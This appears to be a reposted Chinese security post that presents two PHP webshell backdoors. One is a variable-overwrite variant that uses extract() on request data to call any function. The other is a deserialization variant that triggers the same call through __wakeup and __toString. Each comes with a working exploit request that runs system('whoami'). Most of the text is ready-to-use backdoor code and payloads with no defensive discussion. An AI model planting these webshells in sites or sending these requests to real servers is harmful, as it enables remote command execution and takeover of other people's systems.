变量覆盖型:
<?phpif($_GET['exec']==="0"){exit;}else if($_GET['exec']==="1"){call_user_func(function() {$cmd = function($params){extract($params);$a($b);};$cmd($_REQUEST);});}
利用:
exec=1&a=system&b=whoami反序列化型:
<?phpclass test{public $id = array('a'=>'1','b'=>'2');function __wakeup(){echo $this;}function __toString(){call_user_func(function() {$cmd = function($params){extract($params);$a($b);};$cmd($this->id);});}};if($_GET['exec']==="0"){exit;}else if($_GET['exec']==="1"){$test1 = $_GET['string'];$test2 = unserialize($test1);}
利用:
exec=1&string=O:4:"test":1:{s:2:"id";a:2:{s:1:"a";s:6:"system";s:1:"b";s:6:"whoami";}}可参考:
https://mp.weixin.qq.com/s/WQaSVZQ_jeH9RiTvRwd16A
文章来源: http://mp.weixin.qq.com/s?__biz=MzI1ODM1MjUxMQ==&mid=2247492688&idx=1&sn=48e49640ca1a5bf9eac99c68c3c88d47&chksm=ea0bd040dd7c59567fd6f24525e7c9f88af4d74d52f20771e83ec637b5fe43a88207876f8eaa#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh